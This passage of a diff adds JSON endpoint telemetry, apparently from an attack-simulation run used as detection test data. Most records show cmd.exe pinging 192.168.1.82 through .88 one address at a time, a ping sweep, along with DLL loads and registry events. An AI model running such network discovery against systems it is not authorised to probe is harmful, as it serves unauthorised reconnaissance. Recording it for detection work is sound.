"timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572371990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "event_type": "process", + "pid": 556, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572376830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010584B5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.82", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6016, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572376970000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376830000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572376990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "event_type": "process", + "pid": 6016, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572381990000, + "unique_pid": "{42FC7E13-CB75-5C05-0000-0010CC4D5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.83", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 3912, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572382190000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382140000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572382300000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "event_type": "process", + "pid": 3912, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572386830000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-001083505201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.84", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6280, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572387029984, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572386980000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "event_type": "process", + "pid": 6280, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572391990000, + "unique_pid": "{42FC7E13-CB76-5C05-0000-00100C535201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.85", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 2900, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572392150000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572392140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Input\\Locales", + "registry_value": "Locales", + "timestamp": 131883572396050000, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM", + "registry_path": "HKLM\\SOFTWARE", + "registry_value": "SOFTWARE", + "timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE", + "registry_path": "HKLM\\SOFTWARE\\Microsoft", + "registry_value": "Microsoft", + "timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "registry", + "pid": 4516, + "process_name": "ctfmon.exe", + "process_path": "C:\\WINDOWS\\system32\\ctfmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Input", + "registry_value": "Input", + "timestamp": 131883572396200016, + "unique_pid": "{42FC7E13-B2C7-5C05-0000-001046BF0300}" + }, + { + "event_type": "process", + "pid": 2900, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572396830000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010AE555201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.86", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4696, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572397060000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572396980000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572397140000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_value": "VFUProvider", + "timestamp": 131883572400270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "registry", + "pid": 2712, + "process_name": "svchost.exe", + "process_path": "c:\\windows\\system32\\svchost.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", + "registry_value": "StartTime", + "timestamp": 131883572400270000, + "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" + }, + { + "event_type": "process", + "pid": 4696, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572401830000, + "unique_pid": "{42FC7E13-CB77-5C05-0000-0010535E5201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.87", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "cmd.exe", + "parent_process_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 7372, + "ppid": 7328, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "create", + "timestamp": 131883572401980000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}", + "unique_ppid": "{42FC7E13-CB50-5C05-0000-0010896B5101}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "PING.EXE", + "image_path": "C:\\Windows\\System32\\PING.EXE", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572401990000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "ws2_32.dll", + "image_path": "C:\\Windows\\System32\\ws2_32.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\System32\\rpcrt4.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\System32\\IPHLPAPI.DLL", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "winnsi.dll", + "image_path": "C:\\Windows\\System32\\winnsi.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "nsi.dll", + "image_path": "C:\\Windows\\System32\\nsi.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "image_load", + "image_name": "mswsock.dll", + "image_path": "C:\\Windows\\System32\\mswsock.dll", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "timestamp": 131883572402140000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "event_type": "process", + "pid": 7372, + "process_name": "PING.EXE", + "process_path": "C:\\Windows\\System32\\PING.EXE", + "subtype": "terminate", + "timestamp": 131883572406830000, + "unique_pid": "{42FC7E13-CB78-5C05-0000-001048615201}" + }, + { + "command_line": "ping -n 1 -w 100 192.168.1.88", + "event_type": "process", + 